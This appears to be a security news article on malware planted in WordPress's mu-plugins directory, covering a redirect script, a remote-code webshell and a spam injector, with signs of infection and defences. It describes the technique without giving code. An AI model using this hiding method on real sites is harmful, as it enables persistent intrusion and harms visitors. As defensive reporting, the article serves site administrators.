Threat Actors Embed Malware in WordPress Sites to Enable Remote Code Execution

Security researchers have uncovered a new wave of cyberattacks targeting WordPress websites through the exploitation of the “mu-plugins” (Must-Use plugins) directory.

This directory, designed to load plugins automatically without requiring activation, has become an attractive hiding spot for threat actors due to its low visibility in standard WordPress interfaces.

The malware embedded in this directory enables attackers to execute remote code, redirect traffic, and inject spam content, posing significant risks to website security.

- Advertisement -

Techniques Used by Attackers

Researchers identified three distinct malware variants within the mu-plugins directory:

1. Fake Update Redirect Malware: Found in the redirect.php file, this malware redirects site visitors to malicious external websites. By disguising itself as a legitimate update mechanism, it avoids detection by bots and administrators while targeting regular users.
2. Remote Code Execution Webshell: A more sophisticated attack was discovered in the index.php file. This webshell allows attackers to download and execute remote PHP scripts dynamically, granting them full control over the compromised site and enabling persistent backdoor access.
3. Spam Injector: Located in custom-js-loader.php, this malware injects spam content and manipulates website elements such as images and links. It replaces site images with explicit content and hijacks outbound links, redirecting users to malicious pop-ups or phishing pages.

Administrators can identify infections through unusual site behavior, such as unauthorized redirections, unexpected file modifications, or elevated server resource usage.

According to the Report, suspicious files with misleading names in the mu-plugins directory are another red flag.

Implications of the Malware

The impact of these attacks is multifaceted:

• Traffic Redirection: Redirecting users to malicious websites can damage a site’s reputation and lead to malware downloads for visitors.
• Persistent Backdoors: Webshells allow attackers to maintain long-term access, enabling data theft, further malware deployment, or website defacement.
• SEO Spam Injection: Replacing images with explicit content and manipulating links can harm a site’s credibility and SEO rankings.

The primary infection methods include exploiting outdated plugins or themes, compromised administrator credentials, and weak server configurations.

Once inside the mu-plugins directory, the malware ensures automatic execution with WordPress, making detection challenging.

The exploitation of the mu-plugins directory underscores the evolving tactics of threat actors in embedding malware within WordPress sites.

Proactive measures such as regular security audits, updates, and robust access controls are essential to safeguard websites against such sophisticated attacks.

Find this News Interesting! Follow us on Google News, LinkedIn, and X to Get Instant Updates!